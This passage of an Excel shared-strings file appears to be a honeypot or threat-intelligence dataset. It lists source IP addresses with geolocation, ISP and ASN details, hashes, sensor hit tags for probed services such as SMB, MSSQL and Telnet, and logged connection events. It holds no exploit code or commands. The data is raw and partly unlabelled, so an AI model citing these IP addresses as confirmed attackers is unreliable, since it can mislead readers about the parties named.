    <t>Patna (Police Colony)</t>
  </si>
  <si>
    <t>1260086</t>
  </si>
  <si>
    <t>800001</t>
  </si>
  <si>
    <t>25.5819</t>
  </si>
  <si>
    <t>85.0818</t>
  </si>
  <si>
    <t>BHARTI-MO-IN</t>
  </si>
  <si>
    <t>::ffff:dfe2:7e21</t>
  </si>
  <si>
    <t>17d2db2ba68d87ab2cbb277c23a3c93a</t>
  </si>
  <si>
    <t>117.202.65.40</t>
  </si>
  <si>
    <t>Kuzhithurai</t>
  </si>
  <si>
    <t>1265387</t>
  </si>
  <si>
    <t>8.31792</t>
  </si>
  <si>
    <t>77.1919</t>
  </si>
  <si>
    <t>::ffff:75ca:4128</t>
  </si>
  <si>
    <t>3dd746cacaf4190053dbe264703fabd6</t>
  </si>
  <si>
    <t>117.242.238.162</t>
  </si>
  <si>
    <t>9650&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75f2:eea2</t>
  </si>
  <si>
    <t>850c5fa96b616e7eadf449cb383e4282</t>
  </si>
  <si>
    <t>37.37.181.89</t>
  </si>
  <si>
    <t>AH</t>
  </si>
  <si>
    <t>Al Aḩmadī</t>
  </si>
  <si>
    <t>Ar Riqqah</t>
  </si>
  <si>
    <t>285728</t>
  </si>
  <si>
    <t>29.1458</t>
  </si>
  <si>
    <t>48.0947</t>
  </si>
  <si>
    <t>42961</t>
  </si>
  <si>
    <t>GPRS-AS</t>
  </si>
  <si>
    <t>Mobile Telecommunications Company</t>
  </si>
  <si>
    <t>Zain Mobile Connectivity Services</t>
  </si>
  <si>
    <t>::ffff:2525:b559</t>
  </si>
  <si>
    <t>c615306999a905256d049a6513273de4</t>
  </si>
  <si>
    <t>202.66.164.109</t>
  </si>
  <si>
    <t>NA&amp;&amp;static-ip-109-164-66-202.rev.dyxnet.com</t>
  </si>
  <si>
    <t>2000-01-04 12:55:40</t>
  </si>
  <si>
    <t>2030-01-04 12:55:40</t>
  </si>
  <si>
    <t>2024-11-19 08:01:47</t>
  </si>
  <si>
    <t>['NS1.DIYIXIAN.COM', 'NS2.DIYIXIAN.COM']</t>
  </si>
  <si>
    <t>::ffff:ca42:a46d</t>
  </si>
  <si>
    <t>d07e98e60989cfd126f93accfa0c3f4d</t>
  </si>
  <si>
    <t>213.109.233.133</t>
  </si>
  <si>
    <t>Ivano-Frankivsk</t>
  </si>
  <si>
    <t>Ivano-Frankivsk Raion</t>
  </si>
  <si>
    <t>707471</t>
  </si>
  <si>
    <t>48.9231</t>
  </si>
  <si>
    <t>24.7125</t>
  </si>
  <si>
    <t>47702</t>
  </si>
  <si>
    <t>Teleradiocompany Discovery Ltd.</t>
  </si>
  <si>
    <t>Teleradiocompany Discovery Ltd</t>
  </si>
  <si>
    <t>Discovery LLC</t>
  </si>
  <si>
    <t>2009-10-07</t>
  </si>
  <si>
    <t>::ffff:d56d:e985</t>
  </si>
  <si>
    <t>7a50bc32b0d04e4fb3aa0b6714b5cf23</t>
  </si>
  <si>
    <t>59.95.159.28</t>
  </si>
  <si>
    <t>::ffff:3b5f:9f1c</t>
  </si>
  <si>
    <t>456289b01334af36de11256c21a26231</t>
  </si>
  <si>
    <t>59.91.171.47</t>
  </si>
  <si>
    <t>::ffff:3b5b:ab2f</t>
  </si>
  <si>
    <t>69e3893593ce6a51a87acc013c6a38dc</t>
  </si>
  <si>
    <t>117.194.54.115</t>
  </si>
  <si>
    <t>::ffff:75c2:3673</t>
  </si>
  <si>
    <t>826cf42135c92ca4e2b3a79a228b420e</t>
  </si>
  <si>
    <t>80.241.240.142</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_SSH_H29&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_SOCKS5_H43&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;22&amp;&amp;5900&amp;&amp;1080&amp;&amp;9100&amp;&amp;445&amp;&amp;80&amp;&amp;38486&amp;&amp;1433&amp;&amp;52527&amp;&amp;53046</t>
  </si>
  <si>
    <t>GE</t>
  </si>
  <si>
    <t>T'bilisi</t>
  </si>
  <si>
    <t>Tbilisi (Vake-Saburtalo)</t>
  </si>
  <si>
    <t>611717</t>
  </si>
  <si>
    <t>41.7235</t>
  </si>
  <si>
    <t>44.7403</t>
  </si>
  <si>
    <t>16010</t>
  </si>
  <si>
    <t>Magticom Ltd.</t>
  </si>
  <si>
    <t>Corporate</t>
  </si>
  <si>
    <t>2005-09-05</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,59613)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,61097)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,61688)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,52497)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,52772)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,62114)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,62406)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,54968)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,55828)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,57780)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,58414)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,55432)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,52527)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,50356)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,51028)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,53198)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,53624)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,64891)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,65463)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:50f1:f08e</t>
  </si>
  <si>
    <t>81b388734bb1774e2746e1b6bf95c21a</t>
  </si>
  <si>
    <t>59.97.247.161</t>
  </si>
  <si>
    <t>::ffff:3b61:f7a1</t>
  </si>
  <si>
    <t>f0fd4512c3b82918daf6082a9c1fa6a7</t>
  </si>
  <si>
    <t>117.233.153.230</t>
  </si>
  <si>
    <t>::ffff:75e9:99e6</t>
  </si>
  <si>
    <t>e7ada36f26a48ac3d257628fba7782d9</t>
  </si>
  <si>
    <t>117.199.199.246</t>
  </si>
  <si>
    <t>::ffff:75c7:c7f6</t>
  </si>
  <si>
    <t>1efeb0eb336281fdd1591f1a28d89502</t>
  </si>
  <si>
    <t>220.141.206.143</t>
  </si>
  <si>
    <t>220-141-206-143.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:dc8d:ce8f</t>
  </si>
  <si>
    <t>17b11c4fe03165df40b1959517596fbf</t>
  </si>
  <si>
    <t>59.182.240.15</t>
  </si>
  <si>
    <t>::ffff:3bb6:f00f</t>
  </si>
  <si>
    <t>c5db8149923201df94ee67c99be8ac93</t>
  </si>
  <si>
    <t>101.109.200.103</t>
  </si>
  <si>
    <t>NA&amp;&amp;node-13l3.pool-101-109.dynamic.totinternet.net</t>
  </si>
  <si>
    <t>GMO Internet Group, Inc. d/b/a Onamae.com</t>
  </si>
  <si>
    <t>abuse@gmo.jp</t>
  </si>
  <si>
    <t>::ffff:656d:c867</t>
  </si>
  <si>
    <t>8e1679d5c397676db6fb70d87d10acf1</t>
  </si>
  <si>
    <t>117.223.28.221</t>
  </si>
  <si>
    <t>::ffff:75df:1cdd</t>
  </si>
  <si>
    <t>a9c5bffcc17efdbd6bb205adcec72302</t>
  </si>
  <si>
    <t>117.195.24.19</t>
  </si>
  <si>
    <t>::ffff:75c3:1813</t>
  </si>
  <si>
    <t>6322f7d3dbe90dc035e661d445ee4f72</t>
  </si>
  <si>
    <t>185.201.188.16</t>
  </si>
  <si>
    <t>South Lanarkshire</t>
  </si>
  <si>
    <t>Symington</t>
  </si>
  <si>
    <t>2636349</t>
  </si>
  <si>
    <t>55.5984</t>
  </si>
  <si>
    <t>-3.5951</t>
  </si>
  <si>
    <t>203020</t>
  </si>
  <si>
    <t>HostRoyale Technologies Pvt Ltd</t>
  </si>
  <si>
    <t>Hostroyale</t>
  </si>
  <si>
    <t>::ffff:b9c9:bc10</t>
  </si>
  <si>
    <t>a2282cd74bee839af11c2af5c1dc0315</t>
  </si>
  <si>
    <t>117.195.198.229</t>
  </si>
  <si>
    <t>::ffff:75c3:c6e5</t>
  </si>
  <si>
    <t>a1c0c17ce6186807cf0e9000f2a17f07</t>
  </si>
  <si>
    <t>27.6.246.212</t>
  </si>
  <si>
    <t>::ffff:1b06:f6d4</t>
  </si>
  <si>
    <t>2508259789789342933e5bd59b4d0218</t>
  </si>
  <si>
    <t>59.92.161.233</t>
  </si>
  <si>
    <t>::ffff:3b5c:a1e9</t>
  </si>
  <si>
    <t>a0a8eefc698013b6a4af7461d9501008</t>
  </si>
  <si>
    <t>59.93.7.0</t>
  </si>
  <si>
    <t>::ffff:3b5d:700</t>
  </si>
  <si>
    <t>f2d10529bbff967b98e3cef0eec2d733</t>
  </si>
  <si>
    <t>180.48.233.6</t>
  </si>
  <si>
    <t>p689006-ipxg00c01wakayama.wakayama.ocn.ne.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_PJL_HC1</t>
  </si>
  <si>
    <t>23&amp;&amp;9100&amp;&amp;1734&amp;&amp;NA</t>
  </si>
  <si>
    <t>Wakayama</t>
  </si>
  <si>
    <t>Wakayama Shi</t>
  </si>
  <si>
    <t>1926004</t>
  </si>
  <si>
    <t>640-0000</t>
  </si>
  <si>
    <t>34.2304</t>
  </si>
  <si>
    <t>135.171</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b430:e906</t>
  </si>
  <si>
    <t>d96f33c9268cd3c2fb816fa5f96af974</t>
  </si>
  <si>
    <t>184.175.61.39</t>
  </si>
  <si>
    <t>184-175-61-39.dsl.teksavvy.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>M5A</t>
  </si>
  <si>
    <t>43.6532</t>
  </si>
  <si>
    <t>-79.3832</t>
  </si>
  <si>
    <t>5645</t>
  </si>
  <si>
    <t>TekSavvy Solutions, Inc.</t>
  </si>
  <si>
    <t>::ffff:b8af:3d27</t>
  </si>
  <si>
    <t>f69ef8e706ddc0327186f45efe08caec</t>
  </si>
  <si>
    <t>190.109.202.6</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_SSH_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;38455&amp;&amp;22&amp;&amp;23</t>
  </si>
  <si>
    <t>Honduras</t>
  </si>
  <si>
    <t>FM</t>
  </si>
  <si>
    <t>Francisco Morazán Department</t>
  </si>
  <si>
    <t>Distrito Central</t>
  </si>
  <si>
    <t>Tegucigalpa (Colonia Florencia Norte)</t>
  </si>
  <si>
    <t>3600949</t>
  </si>
  <si>
    <t>11101</t>
  </si>
  <si>
    <t>14.0867</t>
  </si>
  <si>
    <t>-87.1742</t>
  </si>
  <si>
    <t>23383</t>
  </si>
  <si>
    <t>METRORED S.A. DE C.V.</t>
  </si>
  <si>
    <t>Metrored S.a. De C.V.</t>
  </si>
  <si>
    <t>Navega.com Honduras</t>
  </si>
  <si>
    <t>::ffff:be6d:ca06</t>
  </si>
  <si>
    <t>9fafe8e52dd1defabcb605703583eab0</t>
  </si>
  <si>
    <t>59.91.252.28</t>
  </si>
  <si>
    <t>::ffff:3b5b:fc1c</t>
  </si>
  <si>
    <t>654f98c1bf9f522528f6c001b185744d</t>
  </si>
  <si>
    <t>210.212.230.13</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;58659&amp;&amp;59578&amp;&amp;50907</t>
  </si>
  <si>
    <t>Villupuram</t>
  </si>
  <si>
    <t>Auroville</t>
  </si>
  <si>
    <t>6620455</t>
  </si>
  <si>
    <t>605101</t>
  </si>
  <si>
    <t>12.0376</t>
  </si>
  <si>
    <t>79.7545</t>
  </si>
  <si>
    <t>Sattva Hitech and Conware Pvt Limited</t>
  </si>
  <si>
    <t>1999-03-16</t>
  </si>
  <si>
    <t>SattvaHitech</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (210.212.230.13,49514)}&amp;&amp;{Data_SMB:Incoming connection (210.212.230.13,50299)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (210.212.230.13,55217)}&amp;&amp;{Data_SMB:Incoming connection (210.212.230.13,56298)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:d2d4:e60d</t>
  </si>
  <si>
    <t>b32a2a7b29a599129af58fa58faa162e</t>
  </si>
  <si>
    <t>170.81.62.87</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>2444&amp;&amp;23</t>
  </si>
  <si>
    <t>Cachoeira Municipality</t>
  </si>
  <si>
    <t>Cachoeira</t>
  </si>
  <si>
    <t>3468535</t>
  </si>
  <si>
    <t>-12.6014</t>
  </si>
  <si>
    <t>-38.9658</t>
  </si>
  <si>
    <t>266401</t>
  </si>
  <si>
    <t>CNA NET</t>
  </si>
  <si>
    <t>CNA</t>
  </si>
  <si>
    <t>::ffff:aa51:3e57</t>
  </si>
  <si>
    <t>0bdfe3682c7259303dbbaa9438aac270</t>
  </si>
  <si>
    <t>117.208.223.34</t>
  </si>
  <si>
    <t>::ffff:75d0:df22</t>
  </si>
  <si>
    <t>c84c8dcc830ec69bf977f9bf8bc38110</t>
  </si>
  <si>
    <t>116.103.219.171</t>
  </si>
  <si>
    <t>5432&amp;&amp;1080</t>
  </si>
  <si>
    <t>{Data_POSTGRES:NA}&amp;&amp;{Data_SOCKS5:NA}</t>
  </si>
  <si>
    <t>::ffff:7467:dbab</t>
  </si>
  <si>
    <t>9dd241587e4a8ec2b6d05e2a5e6e0cd6</t>
  </si>
  <si>
    <t>117.242.205.203</t>
  </si>
  <si>
    <t>::ffff:75f2:cdcb</t>
  </si>
  <si>
    <t>370c7124809a0a4ced15f8a098711df2</t>
  </si>
  <si>
    <t>117.220.20.152</t>
  </si>
  <si>
    <t>::ffff:75dc:1498</t>
  </si>
  <si>
    <t>a39d46c84d4954e297f42ee7e5b2a2cd</t>
  </si>
  <si>
    <t>103.191.218.153</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;5486&amp;&amp;445</t>
  </si>
  <si>
    <t>Cirebon Regency</t>
  </si>
  <si>
    <t>Sumber</t>
  </si>
  <si>
    <t>1626183</t>
  </si>
  <si>
    <t>-6.79595</t>
  </si>
  <si>
    <t>108.442</t>
  </si>
  <si>
    <t>149930</t>
  </si>
  <si>
    <t>PT Replay Inti Media</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,65121)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,49416)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,49384)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,49768)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,52738)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,53416)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,64980)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,49360)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,52847)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,53390)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,55569)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,56170)}</t>
  </si>
  <si>
    <t>::ffff:67bf:da99</t>
  </si>
  <si>
    <t>0a4103ef1fb87633496859c8d0e5308a</t>
  </si>
  <si>
    <t>37.37.207.89</t>
  </si>
  <si>
    <t>Kuwait City (Jibla)</t>
  </si>
  <si>
    <t>29.3716</t>
  </si>
  <si>
    <t>47.9736</t>
  </si>
  <si>
    <t>::ffff:2525:cf59</t>
  </si>
  <si>
    <t>7137726cff584534ff3176ae82bf6fdb</t>
  </si>
  <si>
    <t>119.2.123.98</t>
  </si>
  <si>
    <t>Bhutan</t>
  </si>
  <si>
    <t>15</t>
  </si>
  <si>
    <t>Thimphu District</t>
  </si>
  <si>
    <t>Thimphu</t>
  </si>
  <si>
    <t>1252416</t>
  </si>
  <si>
    <t>27.4716</t>
  </si>
  <si>
    <t>89.6386</t>
  </si>
  <si>
    <t>18024</t>
  </si>
  <si>
    <t>Bhutan Telecom Ltd</t>
  </si>
  <si>
    <t>Druknet</t>
  </si>
  <si>
    <t>::ffff:7702:7b62</t>
  </si>
  <si>
    <t>f5c9b54bf37351710c6f43090d9c9be5</t>
  </si>
  <si>
    <t>175.136.71.28</t>
  </si>
  <si>
    <t>3.13725</t>
  </si>
  <si>
    <t>101.693</t>
  </si>
  <si>
    <t>Tm Technology Services Sdn Bhd</t>
  </si>
  <si>
    <t>::ffff:af88:471c</t>
  </si>
  <si>
    <t>ac80248edea94022afec682dd61b72f6</t>
  </si>
  <si>
    <t>117.221.202.124</t>
  </si>
  <si>
    <t>::ffff:75dd:ca7c</t>
  </si>
  <si>
    <t>70206d828c5182e344658d0e0f0db465</t>
  </si>
  <si>
    <t>117.241.7.131</t>
  </si>
  <si>
    <t>::ffff:75f1:783</t>
  </si>
  <si>
    <t>bc30dedf5e404c26b3705b4fafe74976</t>
  </si>
  <si>
    <t>125.228.169.56</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-169-56.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:7de4:a938</t>
  </si>
  <si>
    <t>bd1150ac4265a42495bc59a0cda44d55</t>
  </si>
  <si>
    <t>147.185.133.126</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_IRC_H47&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_HTTPS_H14</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;37161&amp;&amp;389&amp;&amp;1433&amp;&amp;6667&amp;&amp;54624&amp;&amp;443&amp;&amp;80&amp;&amp;54449&amp;&amp;55929</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08	
x0bx0c_x000D_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:93b9:857e</t>
  </si>
  <si>
    <t>95db7184d39ef5fe399815e4c915742d</t>
  </si>
  <si>
    <t>78.187.43.219</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;389&amp;&amp;46207&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:4ebb:2bdb</t>
  </si>
  <si>
    <t>55df4dab2c0e47353d17c716ed0ac9ed</t>
  </si>
  <si>
    <t>24.133.202.105</t>
  </si>
  <si>
    <t>Denizli</t>
  </si>
  <si>
    <t>317109</t>
  </si>
  <si>
    <t>37.7742</t>
  </si>
  <si>
    <t>29.0875</t>
  </si>
  <si>
    <t>47524</t>
  </si>
  <si>
    <t>Turksat Uydu Haberlesme ve Kablo TV Isletme A.S.</t>
  </si>
  <si>
    <t>TURKSAT Cable Internet</t>
  </si>
  <si>
    <t>2012-03-08</t>
  </si>
  <si>
    <t>::ffff:1885:ca69</t>
  </si>
  <si>
    <t>60a597591fee60e74534bcea8c71ff0e</t>
  </si>
  <si>
    <t>51.19.200.195</t>
  </si>
  <si>
    <t>3313C8c3.skybroadband.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>London (Shadwell)</t>
  </si>
  <si>
    <t>E1</t>
  </si>
  <si>
    <t>51.5181</t>
  </si>
  <si>
    <t>-0.0714189</t>
  </si>
  <si>
    <t>::ffff:3313:c8c3</t>
  </si>
  <si>
    <t>2ff6160f463131ad35811c737c640cef</t>
  </si>
  <si>
    <t>117.192.109.68</t>
  </si>
  <si>
    <t>::ffff:75c0:6d44</t>
  </si>
  <si>
    <t>4e0f84ff8066ed5a1ffcde3013949133</t>
  </si>
  <si>
    <t>42.114.121.226</t>
  </si>
  <si>
    <t>Ô Chợ Dừa</t>
  </si>
  <si>
    <t>12808881</t>
  </si>
  <si>
    <t>21.0215</t>
  </si>
  <si>
    <t>105.825</t>
  </si>
  <si>
    <t>::ffff:2a72:79e2</t>
  </si>
  <si>
    <t>f77303e7b62ad08e6e63a019ebc591aa</t>
  </si>
  <si>
    <t>125.228.181.148</t>
  </si>
  <si>
    <t>125-228-181-148.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H19&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;32377&amp;&amp;80&amp;&amp;36053&amp;&amp;36040&amp;&amp;35998&amp;&amp;36067&amp;&amp;23&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7de4:b594</t>
  </si>
  <si>
    <t>2bb99aa73812b85f7af4046ac32dfde7</t>
  </si>
  <si>
    <t>125.228.113.126</t>
  </si>
  <si>
    <t>125-228-113-126.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H40&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;abuseipdb</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;61882&amp;&amp;80&amp;&amp;23&amp;&amp;31815&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7de4:717e</t>
  </si>
  <si>
    <t>b4a55ebe516b6786a02febafb1d5a28a</t>
  </si>
  <si>
    <t>59.126.120.179</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-126-120-179.hinet-ip.hinet.net</t>
  </si>
  <si>
